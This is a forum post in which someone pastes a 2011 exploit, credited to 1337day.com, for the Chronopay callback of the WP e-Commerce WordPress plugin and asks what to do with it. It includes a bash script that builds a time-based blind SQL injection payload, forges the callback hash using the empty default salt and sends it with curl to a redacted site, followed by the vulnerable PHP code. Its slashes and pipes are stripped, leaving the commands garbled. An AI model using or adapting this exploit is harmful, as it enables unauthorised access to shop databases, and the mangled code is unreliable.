What do I do here?
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill httpwww.[redacted].comchronopay_callback=true
---------------
Vulnerable code
---------------
.wp-e-commercewp-shopping-cart.php
class WP_eCommerce {
function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}
function init() {
...
$this-load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();
.wp-e-commercewpsc-corewpsc-functions.php
function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_fields;
$gateway_directory = WPSC_FILE_PATH . 'wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . 'wpsc-merchants' . $nzshpcrt_merchant );
}
.wp-e-commercewpsc-merchantschronopay.php
function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] == 'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
- this is by default '' and set only if explicitly stated
inside Store Settings-Payments-General Settings-
Chronopay-Edit-Security Key
- problem is that there are more popular payment gateways enlisted (e.g.
Google Checkout and PayPal) and if that setting is not explicitly set
it wide opens the door to the potential attacker
$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['transaction_type']));
switch($verification_data['trans_type'])
{
...
case 'rebill'
$wpdb-query(UPDATE `.WPSC_TABLE_PURCHASE_LOGS.` SET
`processed` = '2',
`transactid` = '.$transaction_id.',
`date` = '.time().'
WHERE `sessionid` = .$sessionid. LIMIT 1);
...
add_action('init', 'nzshpcrt_chronopay_callback');
# 1337day.com [2011-09-13]
---------- Post updated at 07:38 AM ---------- Previous update was at 03:50 AM ----------
Anyone?